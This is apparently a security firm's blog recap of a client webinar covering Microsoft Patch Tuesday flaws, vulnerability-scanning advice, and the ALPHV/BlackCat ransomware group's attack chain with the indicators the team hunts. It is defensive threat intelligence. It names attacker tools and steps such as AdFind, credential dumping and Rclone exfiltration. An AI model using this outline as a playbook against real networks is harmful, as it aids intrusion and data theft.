As part of our ongoing efforts to support our clients, the Pondurance team hosts a webinar to keep clients current on the state of cybersecurity.
Over the past few months, the team discussed notable vulnerabilities and trends, provided a threat intelligence review, and explained some recent threat hunting tactics.
Vulnerabilities and trends
The Vulnerability Management Team Lead, kicked off the client webinar with a look at Microsoft’s Patch Tuesday releases for May 9, which included 38 vulnerabilities. Three of those vulnerabilities were zero-day exploits: 1) a vulnerability in the Win32k driver that allowed for elevation of privileges to the system, 2) a secure boot bypass call that allowed the attacker to install an affected boot policy, and 3) a Windows object linking and embedding remote code execution that enticed a victim to open an email using a vulnerable version of Outlook software.
The team discussed recent new findings seen in vulnerability scans. In particular, threat actors have exploited a remote code execution vulnerability in the Microsoft message queuing service to target specific applications, such as financial services, e-commerce, and sales automation software. This form of attack showed up on internal vulnerability scans for almost every client in May.
The Pondurance team recommends several strategies and configuration changes to combat such vulnerabilities in client networks. These include:
- Splitting off workstations and servers and running them in separate scans
- Running a discovery scan in Nexus and performing manual target discovery work
- Scanning only selected assets, rather than scanning hundreds of assets over several nights
- Increasing the scanning window
- Deploying multiple virtual machines for internal scans
In addition, the vulnerability management team is looking at ransomware cases. Specifically, the team is investigating vulnerable installations of flawed Veritas backup software found on the internet.
Threat intelligence review
The Security Operations Center discussed recent updates to the #StopRansomware Guide, a comprehensive resource to help businesses reduce the risk of ransomware attacks by using best practices. The updates included recommendations to prevent common initial infection vectors, an expansion of the ransomware checklist with threat hunting tips for detection analysis, recommendations to address cloud backups and zero-trust architecture, and many others.
The SOC team also provided an in-depth look at the BlackCat ransomware group, known as ALPHV, which continues to increase its number of observed victims. As many as 8,300 organizations have fallen victim to ALPHV in the last 60 days, according to Recorded Future News. And if the mere number of victims is not enough to cause alarm, some of the ransom demands have exceeded $2 million.
In addition, the team identified the top four hashes associated with ALPHV and suggested that the hashes used in the attacks appear to be tied together, leading cyber defenders to the conclusion that the various groups are working in unison.
“These threat actors are getting the bands together again and creating a supergroup even,” -Pondurance SOC.
Recent Threat hunting tactics
The Security Operations Center Team Lead, continued the discussion about ALPHV, identifying potential scenarios around the group’s known execution chains and explaining how the Pondurance team hunts for indicators of compromise (IoCs) generated during the group’s attacks.
The Team Lead explained that the first method of attack for ALPHV is the exploitation of an unpatched exchange server. The group uses different tactics, techniques, and procedures during the attack life cycle, which can include:
- Using net.exe to collect system and network information
- Gathering active directory environment information via tools such as ADRecon and AdFind
- Dumping credentials via local security authority processes that allow them to steal credentials
- Using the credentials to move laterally in the system to escalate and elevate privileges
- Exfiltrating data using tools like MegaSync and Rclone
- Gathering domain configuration, intellectual property, personally identifiable information, and protected health information to use as a form of double extortion
A second attack method involves the use of compromised credentials, purchased on the black market, to gain initial access to a victim’s environment. Once the group has access, ALPHV collects system information to learn everything necessary to move laterally throughout the network, dropping and installing legitimate software. Then, the threat actor continues working on credential theft, attempting to escalate and elevate privileges. Ultimately, ALPHV will execute BlackCat malware to receive the ransom payment.
The Pondurance team has many tactics to proactively and retroactively hunt a threat actor such as ALPHV. Several IoCs that the team hunts are:
- Common hashes, executables, dynamic-link libraries, and file names
- Parent-child process relationships, specifically looking at the AdFind tool
- Rclone executing at the command line
- Network-based signatures
- Impackets run as a service on an endpoint
- Modification of firewall and remote desktop rules
- Endpoint detection and response agents
Experiencing a breach? Contact Us
Emergency IR Hotline: 888.385.1720